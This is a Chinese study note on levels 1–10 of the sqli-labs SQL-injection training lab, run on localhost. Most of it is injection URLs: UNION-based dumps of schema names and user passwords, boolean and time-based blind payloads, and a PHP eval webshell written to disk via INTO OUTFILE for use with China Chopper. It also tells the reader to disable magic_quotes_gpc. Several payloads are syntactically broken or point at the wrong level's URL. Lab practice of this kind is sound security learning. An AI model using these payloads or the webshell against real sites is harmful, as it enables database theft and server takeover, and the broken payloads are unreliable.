Sqli-lab注入靶场 1-10笔记

目录

通关大致思路：

Less1GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

Less-4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

Less-7 GET - Dump into outfile - String （导出文件GET字符型注入）

Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

---

通关大致思路：

1.判断注入点
2.通过报错信息知道如何闭合参数
3.猜字段数及其回显
4.构造语句获取想要的信息

Less1GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

url中添加get参数?id=1，即

http://127.0.0.1/sqli-labs-master/Less-1/?id=1进入注入页面。

判断是否有注入点
先输入and 1=1 and 1=2代判断是否是整型注入（因为and 1=1与and 1=2回显的是一样的）

http://127.0.0.1/sqli-labs-master/Less-1/?id=1 and 1=1

http://127.0.0.1/sqli-labs-master/Less-1 /?id=1 and 1=2

所以排除整型注入
再用’进行判断注入
利用返回的错误类型,判断是什么类型的字符注入

在url后面添加英文输入法中的单引号，即

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27则报错

在这里我遇到了一个问题，就是不报错

 在网上搜寻了一下解决方法：

打开phpstudy小皮，点击设置，配置文件，把所用的php版本中的php.ini中

magic_quotes_gpc = On  改为magic_quotes_gpc = Off，并重启Apache，就可以解决问题

然后确定字段数

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27 order by 3%23

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27 order by 4%23

联合查询查看页面是否有显示位

http://127.0.0.1/sqli-labs-master/Less-1/?id=1000%27 union select 1,2,3%23

 查看数据库名

http://127.0.0.1/sqli-labs-master/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23

查询表名 
http://127.0.0.1/sqli-labs-master/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23

查询列信息 

http://127.0.0.1/sqli-labs-master/Less-1/?id=1000%27union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %23

查询用户名密码
http://127.0.0.1/sqli-labs-master/Less-1/?id=1000%27union select 1,group_concat(username,password),3 from users %23 

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

把第一题中id=1后面的单引号去掉，其它一样

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

用id=1’查看报错。得知需要）去闭合，所以在第一题的基础上加上），其他一样

Less-4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）

用id=1'单引号查看报错，无变化，输入双引号，页面报错，

所以在第一题基础上，使用双引号、右括号闭合，其他一样

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

单引号的字符型注入但是没有回显 

查看有多少列

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' order by 3--+

使用二分法

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left((select database()),1)='s'--

使用二分法查库

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>100--+

使用二分法查表

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0xsecurity limit 1,1),1,1))>1--+

确定数据

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select username from security.users limit1,1),1,1))>1--+

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

把上一题的单引号改为双引号即可

Less-7 GET - Dump into outfile - String （导出文件GET字符型注入）

一句话木马：PHP版本：?php@eval($_POST["nnn"]);?其中nnn是密码

http://127.0.0.1/sqli-labs-master/Less-7/?id=1’)) union select 1,2,’<?php @eval($_POST["nnn"]);?>’ into outfile “文件所在位置” --+

然后使用中国菜刀访问

Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

查看有多少列

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 3--+

使用二分法

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select database()),1)='s'--

使用二分法查库

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>100--+

使用二分法查表

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0xsecurity limit 1,1),1,1))>1--+

确定数据

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select username from security.users limit1,1),1,1))>1--+

Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

整型注入和字符型注入都没有任何回显

基于时间的盲注 

当存在注入漏洞时，可以使用延迟注入进行判断，此时若存在漏洞，则睡眠之后再返回结果

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(5)--+

判断数据库长度

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(length(database()=8,1,sleep(5))

如果当前数据库的第一个字母的ASCII值大于113的时候，会立刻返回结果，否则立即执行5S，并判断112

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if ascii(substr((select database()),1,1))>113,2,sleep(5))--+

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if ascii(substr((select schema_name from information_schema,schemata limit 4,1),1,1)>112,1,sleep(5))--+

Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

把第九题的单引号改成双引号即可